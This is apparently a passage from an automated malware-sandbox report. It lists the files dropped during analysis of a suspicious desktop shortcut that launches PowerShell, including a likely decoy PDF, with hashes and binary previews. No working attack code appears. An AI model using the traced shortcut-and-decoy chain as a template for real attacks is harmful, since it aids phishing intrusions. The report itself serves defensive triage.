                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                              MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                              SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                              SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                              SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                              Malicious:false
                                                              Preview:@...e................................................@..........

                                                              C:\Users\user\AppData\Local\Temp\MSIdeab7.LOG

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):246
                                                              Entropy (8bit):3.5274671434738973
                                                              Encrypted:false
                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAmfQ9w:Qw946cPbiOxDlbYnuRKs3
                                                              MD5:DA29388F4A29A3ACE9EA754862060A74
                                                              SHA1:88883100BB4442939A63E7CD4F5321F9E490B231
                                                              SHA-256:C5EA3C060FB27DAD9990C9081904FF6AA24DA420906CF8B0252F6B9AD5CAB3BD
                                                              SHA-512:747772A522223B6ABCAA836E5224C86C5216974A73CFE0E2274596FC19B7DDBDA51787FAA7173289623D544B2158689B8829C8D58B6D8893C93043A9FB1AEF30
                                                              Malicious:false
                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.5.:.5.6.:.2.9. .=.=.=.....

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pyr5he0.0am.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jlqairl.lnv.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dinjlwzf.pvg.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juehxvix.zqx.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 05-56-23-987.log

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with very long lines (393)
                                                              Category:dropped
                                                              Size (bytes):16525
                                                              Entropy (8bit):5.338264912747007
                                                              Encrypted:false
                                                              SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                              MD5:128A51060103D95314048C2F32A15C66
                                                              SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                              SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                              SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                              Malicious:false
                                                              Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):15114
                                                              Entropy (8bit):5.335046752204758
                                                              Encrypted:false
                                                              SSDEEP:384:an2g6gJgCBWBdBOpBpBgBQBXBxKW5P5B5P4Z4+4e4/4C4mH/8M/76etD8f8dvJvE:mUb
                                                              MD5:1128F30E29F1D04CA0C9342FEAB6EB0E
                                                              SHA1:A201ACC01BF114A5B7D6EB978C47E3295B8C0D2D
                                                              SHA-256:B0480ED4508ECDA2513754D4EE93273438C8E1D560F4DB4F6991DFA707EA2B82
                                                              SHA-512:18CC3735A1EF4D22C166325873A30C7626476BEE89010E21A40390AE8ECABE607F965983DF2356DAAF0593F410D3DA7CBF114E76643C7A89A7B7CC684CFE4874
                                                              Malicious:false
                                                              Preview:SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:005-0500 ThreadID=7196 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:006-0500 ThreadID=7196 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:006-0500 ThreadID=7196 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:006-0500 ThreadID=7196 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:007-0500 ThreadID=7196 Component=ngl-lib_NglAppLib Description="SetConf

                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):29752
                                                              Entropy (8bit):5.407347364773622
                                                              Encrypted:false
                                                              SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbiSmSYSYSESHSIStSaS3SXSaSMd:V3fOCIdJDeO+9A
                                                              MD5:4253D91492825DBF74976DF74BBD79B6
                                                              SHA1:D3CE80349ABB65F56351CE399FB8CA7104295DDB
                                                              SHA-256:8CD36E4C2A86C2E8AD4C9949864F8E0B10D23ECD2B01326F68D79B9B05E92412
                                                              SHA-512:6DDE5E0E18062F5867CAF6E5C5CFF4CC97DA5649A98BC5E0ED342AB97FDF8F58F201AF85E8DF00093BA233C494820D7CB968A171C2E982DF4B2C2431BB10D595
                                                              Malicious:false
                                                              Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\438fefa3-091e-4288-8761-fcff687d80f1.tmp

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                              Category:dropped
                                                              Size (bytes):758601
                                                              Entropy (8bit):7.98639316555857
                                                              Encrypted:false
                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                              MD5:3A49135134665364308390AC398006F1
                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                              Malicious:false
                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\7337480e-770b-41c9-8d8a-165ab2daffb0.tmp

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                              Category:dropped
                                                              Size (bytes):1419751
                                                              Entropy (8bit):7.976496077007677
                                                              Encrypted:false
                                                              SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                              MD5:95F182500FC92778102336D2D5AADCC8
                                                              SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                              SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                              SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                              Malicious:false
                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\c0415051-49ee-43a3-91bc-11dafdaa8d7b.tmp

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                              Category:dropped
                                                              Size (bytes):386528
                                                              Entropy (8bit):7.9736851559892425
                                                              Encrypted:false
                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                              Malicious:false
                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\c94edeb5-017c-4ec0-bb2f-08f91f54ff82.tmp

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                              Category:dropped
                                                              Size (bytes):1407294
                                                              Entropy (8bit):7.97605879016224
                                                              Encrypted:false
                                                              SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ4ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ48
                                                              MD5:1D64D25345DD73F100517644279994E6
                                                              SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                                                              SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                                                              SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                                                              Malicious:false
                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4ca146fd9f5f240f.customDestinations-ms (copy)

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):4513
                                                              Entropy (8bit):3.7741178368991997
                                                              Encrypted:false
                                                              SSDEEP:48:hjR4L7NPNlHJXqSogZocbNPNlLXqSogZo41:hj6NPNPH5NPNpHv
                                                              MD5:657C38A02C9B64E38ABA248F21DD8E47
                                                              SHA1:05634B2F146D0F19115C259A2BA78A6A2B739AF1
                                                              SHA-256:B1F39C3950356BA203AA74797DCCF79AA8EBC510C7D478A187BDE4CBD5FFAFE8
                                                              SHA-512:D0EB14364F00FD71EA7B3054504ADF91FE12B7AD820761271AD6AEE38A71CC388147573ADC1FFA21A72C265D613DC5D86F248983783387390620639F691CFD27
                                                              Malicious:false
                                                              Preview:...................................FL..................F. .. ..._...W.......R..y...R...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S....@..W.......R....j.2......Y.W .0BNBLJ~1.LNK..N......EW.5.Y.W............................s.0.b.N.B.L.j.P.n.5.6...l.n.k.......W...............-.......V............x......C:\Users\user\Desktop\0bNBLjPn56.lnk....i.m.a.g.e.r.e.s...d.l.l.`.......X.......910646...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwH.Y.W....3.....................{..W.i.n.d.o.w.s.....Z.1......Y.W..System32..B......OwH.Y.W...........................)..S.y.s.t.e.m.3.2.....t.1......O.I..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O6529W2JZJTAX7BONVLK.temp

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):4513
                                                              Entropy (8bit):3.7741178368991997
                                                              Encrypted:false
                                                              SSDEEP:48:hjR4L7NPNlHJXqSogZocbNPNlLXqSogZo41:hj6NPNPH5NPNpHv
                                                              MD5:657C38A02C9B64E38ABA248F21DD8E47
                                                              SHA1:05634B2F146D0F19115C259A2BA78A6A2B739AF1
                                                              SHA-256:B1F39C3950356BA203AA74797DCCF79AA8EBC510C7D478A187BDE4CBD5FFAFE8
                                                              SHA-512:D0EB14364F00FD71EA7B3054504ADF91FE12B7AD820761271AD6AEE38A71CC388147573ADC1FFA21A72C265D613DC5D86F248983783387390620639F691CFD27
                                                              Malicious:false
                                                              Preview:...................................FL..................F. .. ..._...W.......R..y...R...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S....@..W.......R....j.2......Y.W .0BNBLJ~1.LNK..N......EW.5.Y.W............................s.0.b.N.B.L.j.P.n.5.6...l.n.k.......W...............-.......V............x......C:\Users\user\Desktop\0bNBLjPn56.lnk....i.m.a.g.e.r.e.s...d.l.l.`.......X.......910646...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwH.Y.W....3.....................{..W.i.n.d.o.w.s.....Z.1......Y.W..System32..B......OwH.Y.W...........................)..S.y.s.t.e.m.3.2.....t.1......O.I..

                                                              C:\Users\user\Desktop\List of Required items and services.pdf

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:PDF document, version 1.7 (zip deflate encoded)
                                                              Category:dropped
                                                              Size (bytes):871324
                                                              Entropy (8bit):7.827941732382635
                                                              Encrypted:false
                                                              SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                              MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                              SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                              SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                              SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                              Malicious:false
                                                              Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                              Download File
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):55
                                                              Entropy (8bit):4.306461250274409
                                                              Encrypted:false
                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                              Malicious:false
                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                              Static File Info

                                                              General

